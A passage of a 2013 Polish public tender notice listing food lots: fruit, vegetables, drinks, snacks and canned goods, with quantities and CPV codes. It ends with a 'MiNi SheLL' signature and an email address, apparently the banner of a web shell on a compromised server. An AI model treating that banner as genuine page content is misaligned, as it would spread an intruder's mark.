77	Groszek ptysiowy 500g	kg	45
78	Ocet jabłkowy 450ml	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR VII   Warzywa Owoce Napoje 15980000-1, 03221000-6, 03222000-3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość
1. 	Jabłka	kg	1475
2.	Cytryny	kg	71
3.	Banany	kg	644
4.	Szczypiorek pęk	szt	460
5.	Cebula	kg	500
6.	Cebula zielona pęk	szt	100
7.	Kapusta kwaszona	kg	1232
8.	Kapusta świeża	szt	240
9.	Kapusta biała	kg	405
10.	Kapusta czerwona	kg	150
11.	Kapusta pekińska	szt	650
12.	Rzodkiewka pęk	szt	70
13.	Pieczarki świeże	kg	150
14.	Pomidory	kg	320
15.	Ogórki kwaszone	kg	270
16.	Ogórki świeże	kg	250
17.	Sałata zielona	szt	825
18.	Marchew	kg	2555
19.	Burak ćwikłowy	kg	1350
20.	Seler korzeń	kg	350
21.	Natka pietruszki pęk	szt	560
22.	Fasola karłowa Jaś	kg	270
23.	Groch łuszczony	kg	307
24.	Czosnek	kg	13
25	Ziemniaki	kg	8000
26	Sok -300ml.	szt	2932
27	
Papryka świeża	kg	60
28.	Pietruszka korzeń	kg	150
29.	Mandarynki	kg	100
30.	Klementynki	kg	350
31	Winogrono białe	kg	100
32	Winogrono ciemne	kg	100
33.	Koper pęk	szt	50
34.	Sok pomidorowy -330ml	szt	200
35.	Napój 2l czarna porzeczka	szt	200
36.	Oranżada  1,5l	szt	70
37
	Woda Gazowana  0,5l	szt	200
38	Woda Niegazowana0,5l	szt	200
39	Woda Gazowana 1,5l	szt	190
40 	Woda Niegazowana 1,5 l.	szt	380
41.	Soki owocowe 100% 300 ml	szt	100
42.	Sok Witaminka 250ml.	szt	800
43.	Napoje    1l (granat żurawina)	szt	200
44	Napoje    1l (winogrono)	szt	400
45	Napoje owocowy  1l jabłko,wiśnia	szt	200
46.	Sok  100% 2l (pomarańcza)	szt	100
47	Sok 1l czarna porzeczka	szt	420
48	
Pomarańcza	kg	80
49	Kiwi	kg	80
50	Pory	szt	50
51	Grejpfruty	kg	162
52	Granaty	szt	260
53	Makaron spaghetti 500g.	kg	304
54	Sałata lodowa	szt	180
55	Seler naciowy 	szt	160
56	Truskawki	kg	50
57	Ziemniaki młode	kg	120
58	Herbata owocowa  - 50g.	szt	140
59	Biszkopty 140g	szt	200
60	Orzechy włoskie 80g	szt	200
61	Wafle suche podpłomyki bez cukrowe145g	szt	200
62	Ptasie mleczko 380g	szt	200
63	Czekolada 100g mleczna Wedel lub równoważne	szt	300
64	Czekolada gorzka 100g. Wedel lub równoważne	szt	100
65	Czekolada z owocami 100g.	szt	200
66	Wafle familijne 180g. różne smaki	szt	200
67	Piernik w czekoladzie 200g.	szt	200
68	Ciasteczka wiśniowe Cookies with cherry lub równoważne 160g.	szt	200
69	Ciastka HIT 250g. czekoladowe, orzechowe 	szt	200
70	Delicje w czekoladzie147 g.	szt	200
71	Pieguski z czekoladą i rodzynkami 120g.	szt	200
72	Pierniki królewskie śliwkowe 160g.	szt	200
73	Krakersy 180g.	szt	200
74	Toffi fee 125g.	szt	200
75	Baton Twix 51g.	szt	200
76	Princessa mleczna 37g.	szt	200
77	Baton Snikers 51g.	szt	200
78	Biszkopciki Jaśki 180g	szt	200
79	Ciastka dr Gerard 1kg	kg	35
80	Ciastka kruche 1kg	kg	30
81	Czekolada mleczna 300g	szt	200
82	Żurawina suszona 200g.	szt	130
83	Kaki	szt	220
84	Pamelo	szt	220
85	Melon	szt	180
86	Awokado	szt	240
87	Bakłażan	szt	150
88	Brokuł świeży 	szt	100
89	Kalafior świeży	szt	250
90	Szparaga biała	kg	60
91	Fasola szparagowa żółta	kg	80
92	Cebula kanapkowa	kg	90
93	Cebula czerwona	kg	120
94	Brzoskwinie	kg	350
95	Nektarynka
	kg	80
96	Gruszka deserowa	kg	200
97	Rukola sałatkowa200g
	szt	20
98	Bazylia świeża pęk
	szt	60
99	Borówka amerykańska	kg	65
100	Borówka leśna	kg	40
101	Maliny 	kg	100
102	Śliwka węgierka	kg	100
103	Aronia	kg	200
104	Chrupki kukurydziane 80g	szt	1200
105	Chrupki kukurydziane paluszki 60g	szt	100
106	Herbata EARL GREY 50 torebek	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1, 03.22.10.00-6, 03.22.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR VIII  WARZYWA KONSERWOWE LUB PUSZKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość
1.	Kukurydza puszka -400g	szt	740
2.	Papryka konserwowa-650g	szt	480
3.	Pieczarki marynowane-280ml	szt	550
4.
	Chrzan tarty 180g	szt	280
5.	Ogórki konserwowe-870g	szt	488
6.	Jarzyna mrożona-2,5kg	kg	280
7.	Kalafior mrożony-2,5kg	kg	400
8.	Groszek konserwowy -400ml	  szt	370
   9. 	Mieszanka kompotowa-2,5kg.	  kg	700
  10.	Koncentrat pomidorowy . -850g	szt	100
  11.
	Musztarda -175g.	 szt	    185
12.	Selery marynowane 350g	szt	160
13.	Fasola Konserwowa czerwona  400g	szt	180
14.	Fasola konserwowa biała  400g	szt	200
15	Oliwki drylowane
Czerwone 142g	szt	30
16	Oliwki drylowane
Zielone 142g	szt	30
17
	Ananas z puszki 565g.	szt	200
18	Frytki karbowane  do piekarnika 2,5kg	kg	50
19	Brokuły mrożone 2,5kg	kg	100
20	Koncentrat pomidorowy 200ml.	szt	180
21
	Marchewka mrożona junior
	kg
	
150
22	Frytki kuleczki 600g	szt	80
23	Szpinak rozdrobniomy 450g	szt	50
24	Cebula marynowana 300g	szt	80
25	Pomidory krojone bez skórki 400g	szt	150
26	Czosnek konserwowy w oleju 230g	szt	100
27	Warzywa na patelnie 450g	szt	50
28	Brzoskwinie w syropie 860g	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com